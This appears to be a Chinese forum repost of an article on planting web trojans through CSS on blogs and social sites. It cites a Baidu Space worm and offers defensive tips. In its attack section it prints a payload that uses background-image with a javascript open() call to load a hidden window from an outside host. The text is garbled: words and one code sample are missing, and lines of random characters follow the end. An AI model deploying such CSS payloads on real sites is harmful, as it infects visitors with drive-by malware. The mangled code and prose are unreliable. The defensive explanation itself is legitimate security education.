黑客们发现发现,用来制作网页特效的CSS代码,也可以用来挂马。 随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机。他们发现,用来制作网页特效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来。 安天实验室阿楠:安全工程师,从事病毒分析多年。 网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog、Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代黑客的最爱。有许多非常著名的网站都被黑客用CSS挂马入侵过。 在我印象中,记忆最深刻的一次是百度空间CSS挂马。当时,百度空间推出没有多久,就有许多百度用户收到了类似“哈,节日快乐呀!热烈庆祝2008,心情好好,记住要想我http://hi.baidu.com/XXXXX”的站内消息。 由于网址是百度空间的网址,许多用户认为不会存在安全问题,加上又有可能是自己朋友发来的,因此会毫不犹豫地点击进入。但是进入指定的网址后,用户就会感染蠕虫病毒,并继续传播。 由于蠕虫扩散非常严重,最终导致百度空间不得不发布官方声明提醒用户,并且大费周折地在服务器中清除蠕虫的恶意代码。那一次的挂马事件利用的就是百 度空间CSS模板功能,通过变形的expression在CSS代码中动态执行脚本,让指定的远程恶意代码文件在后台悄悄运行并发送大量伪造信息。 我建议大家在点击陌生链接时,要多个心眼,大网站也是可能被挂马的。大家在上网时,最好还是使用一些带网页木马拦截功能的安全辅助工具。 黑客为什么选择CSS挂马? 在Web1.0时代,使用E挂马对于黑客而言,与其说是为了更好地实现木马的隐藏,倒不如说是无可奈何的一个选择。在简单的HTML网页和缺乏交互性的网站中,黑客可以利用的手段也非常有限,即使采取了复杂的伪装,也很容易被识破,还不如E来得直接和有效。 但如今交互式的Web2.0网站越来越多,允许用户设置与修改的博客、SNS社区等纷纷出现。这些互动性非常强的社区和博客中,往往会提供丰富的功能,并且会允许用户使用CSS层叠样式表来对网站的网页进行自由的修改,这促使了CSS挂马流行。 小百科: CSS是层叠样式表(CascadingStyleSheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。这个分隔可以让文件的可读性得到加强、文件的结构更加灵活。 黑客在利用CSS挂马时,往往是借着网民对某些大网站的信任,将CSS恶意代码挂到博客或者其他支持CSS的网页中,当网民在访问该网页时恶意代码 就会执行。这就如同你去一家知名且证照齐全的大医院看病,你非常信任医院,但是你所看的门诊却已经被庸医外包了下来,并且打着医院的名义利用你的信任成功 欺骗了你。但是当你事后去找人算账时,医院此时也往往一脸无辜。对于安全工程师而言,CSS挂马的排查是必备常识。 CSS挂马攻防实录 攻CSS挂马方式较多,但主流的方式是通过有漏洞的博客或者SNS社交网站系统,将恶意的CSS代码写入支持CSS功能的个性化页面中。下面我们以典型的CSS挂马方式为例进行讲解。 方式1: Body “background-image”在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSS挂马方式,这段恶意代码主要是通过“background-image”配合t代码让网页木马悄悄地在用户的电脑中运行。 那如何将这段CSS恶意代码挂到正常的网页中去呢?黑客可以将生成好的网页木马放到自己指定的位置,然后将该段恶意代码写入挂马网站的网页中,或者挂马网页所调用的CSS文件中。 小百科: 使用Body对象元素,主要是为了让对象不再改变整个网页文档的内容,通过Body对象的控制,可以将内容或者效果控制在指定的大小内,如同使用DIV对象那样精确地设置大小。 方式2: Body background-image: url(t:open(http://www.sitedir.com.cn“,”newwindow”,”border=”1″ Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no”)) 方式1的CSS挂马技术,在运行时会出现空白的页面,影响网页访问者正常的访问,因此比较容易发现。不过在方式2中的这段代码,使用了t的Open 开窗,通过新开一个隐藏的窗口,在后台悄悄地运行新窗口并激活访问网页溢出木马页面,不会影响访问者观看网页内容,因此更加隐蔽。 防网络服务器被挂马,通常会出现防病毒软件告警之类的信息。由于漏洞不断更新,挂马种类时刻都在变换,通过客户端的反映来发现服务器是否被挂马往往疏漏较大。正确的做法是经常检查服务器日志,发现异常信息,经常检查网站代码,使用网页木马检测系统,进行排查。 目前除了使用以前的阻断弹出窗口防范CSS挂马之外,还可以在网页中设置CSS过滤,将CSS过滤掉。不过如果你选择过滤CSS的话,首先需要留意自己的相关网页是否有CSS的内容,因此我们仍然首推用阻断方式来防范CSS。阻断代码如下所示: emiao1:expression(this.src=”http://www.sitedir.com.cn”,this.outerHTML=”"); 将外域的木马代码的src重写成本地IE404错误页面的地址,这样,外域的t代码不会被下载。不过阻断方式也有天生致命的弱点,弱点的秘密我们将于下次揭晓& N* l; [9 a* E' ]1 Q1 c

$ s2 Z8 P% g+ b  N5 L; x( a2 r: g: u) |& Q) W. A0 V& v- x" E0 G
, |1 y" j8 H9 v$ F; k; b) H

. @; E7 D+ J$ f+ b+ ]* J; l
7 g* \8 [( z# r* R) K) Q) @1 y- Y0 c/ F* I8 X. {8 V* d

' T+ i9 z3 a0 m5 C( |6 S  V  o! _# E9 I7 R8 h4 t% v' Y
* e% O3 J6 t' i

: ~0 p, z  _& t: ?  D
. v0 a. t( E. s' l* e) I$ I7 K' K& E& l
9 h. N& _# Q8 ]

. x& [- q! s( I: [3 [2 S8 n- c8 ]6 F8 M' V4 A. |5 [/ P: [8 h
: @3 V0 J# z& P9 m
- F8 g3 I$ g. h
/ C( N/ q9 M3 G5 X4 ?  T
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表